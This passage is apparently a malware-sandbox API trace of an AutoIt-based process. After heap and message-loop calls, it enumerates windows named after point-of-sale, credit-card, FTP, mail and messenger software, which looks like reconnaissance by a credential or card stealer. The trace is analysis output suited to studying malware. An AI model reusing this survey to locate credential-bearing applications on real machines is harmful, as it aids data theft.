RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.522] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.522] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.522] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.523] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.523] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0121.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.523] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.523] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9d0 [0121.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9d0 | out: hHeap=0x12c0000) returned 1 [0121.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.524] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.524] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0121.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0121.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0121.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.525] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.525] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0121.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0121.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.525] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0121.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0121.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef990 [0121.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0121.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef990 | out: hHeap=0x12c0000) returned 1 [0121.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.526] GetLastError () returned 0x57 [0121.526] SetLastError (dwErrCode=0x57) [0121.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.526] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.526] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff348 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.538] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa10 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef970 [0121.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0121.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa00 [0121.539] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0121.539] GetWindowTextW (in: hWnd=0x10128, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.539] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0121.539] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.539] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0121.540] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.540] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.540] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.540] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.540] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.540] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.541] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.541] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.541] GetWindowTextW (in: hWnd=0x100be, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.541] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.541] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.541] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.542] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.542] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.542] GetWindowTextW (in: hWnd=0x10098, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.542] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.542] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.542] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.543] GetWindowTextW (in: hWnd=0x10080, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.543] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0121.543] GetWindowTextW (in: hWnd=0x20048, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0121.543] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0121.543] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.543] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.544] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.544] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0121.544] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0121.544] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7deed0) returned 0x9 [0121.544] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0121.544] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.545] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0121.545] GetWindowTextW (in: hWnd=0x20286, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0121.545] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0121.545] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.546] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0121.546] GetWindowTextW (in: hWnd=0x20364, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.546] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0121.546] GetWindowTextW (in: hWnd=0x10336, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0121.546] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0121.546] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0121.546] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0121.547] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0121.547] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0121.547] GetWindowTextW (in: hWnd=0x10366, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0121.547] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0121.547] GetWindowTextW (in: hWnd=0x10306, lpString=0x7deed0, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0121.547] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0121.547] GetWindowTextW (in: hWnd=0x10344, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0121.548] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0121.548] GetWindowTextW (in: hWnd=0x10340, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0121.548] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0121.548] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Barca") returned 5 [0121.548] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0121.548] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.548] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.549] GetWindowTextW (in: hWnd=0x10342, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0121.549] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0121.549] GetWindowTextW (in: hWnd=0x10338, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0121.549] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0121.549] GetWindowTextW (in: hWnd=0x10330, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0121.549] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0121.549] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Far") returned 3 [0121.550] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0121.550] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0121.550] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0121.550] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0121.550] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0121.550] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0121.551] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0121.551] GetWindowTextW (in: hWnd=0x10324, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0121.551] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0121.551] GetWindowTextW (in: hWnd=0x10322, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0121.551] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0121.551] GetWindowTextW (in: hWnd=0x10320, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0121.551] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0121.552] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0121.552] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0121.552] GetWindowTextW (in: hWnd=0x10316, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0121.552] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0121.552] GetWindowTextW (in: hWnd=0x10308, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0121.552] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0121.552] GetWindowTextW (in: hWnd=0x10310, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0121.553] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0121.553] GetWindowTextW (in: hWnd=0x10314, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0121.553] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0121.553] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0121.553] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0121.553] GetWindowTextW (in: hWnd=0x10304, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0121.553] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0121.553] GetWindowTextW (in: hWnd=0x10302, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0121.554] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0121.554] GetWindowTextW (in: hWnd=0x10300, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Winscp") returned 6 [0121.554] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0121.554] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0121.554] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0121.555] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0121.555] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0121.555] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0121.555] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0121.555] GetWindowTextW (in: hWnd=0x102da, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0121.555] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0121.555] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0121.556] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0121.556] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0121.556] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0121.556] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0121.556] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0121.556] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0121.556] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0121.557] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0121.557] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0121.557] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0121.557] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0121.557] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Fling") returned 5 [0121.557] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0121.558] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0121.558] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0121.558] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0121.558] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0121.558] GetWindowTextW (in: hWnd=0x102de, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0121.558] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0121.559] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0121.559] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0121.559] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0121.559] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0121.559] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Icq") returned 3 [0121.559] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0121.560] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Skype") returned 5 [0121.560] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0121.560] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0121.560] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0121.560] GetWindowTextW (in: hWnd=0x20214, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.560] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0121.560] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0121.561] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0121.561] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0121.561] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0121.561] GetWindowTextW (in: hWnd=0x10268, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Serve") returned 5 [0121.561] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0121.561] GetWindowTextW (in: hWnd=0x10260, lpString=0x7deed0, 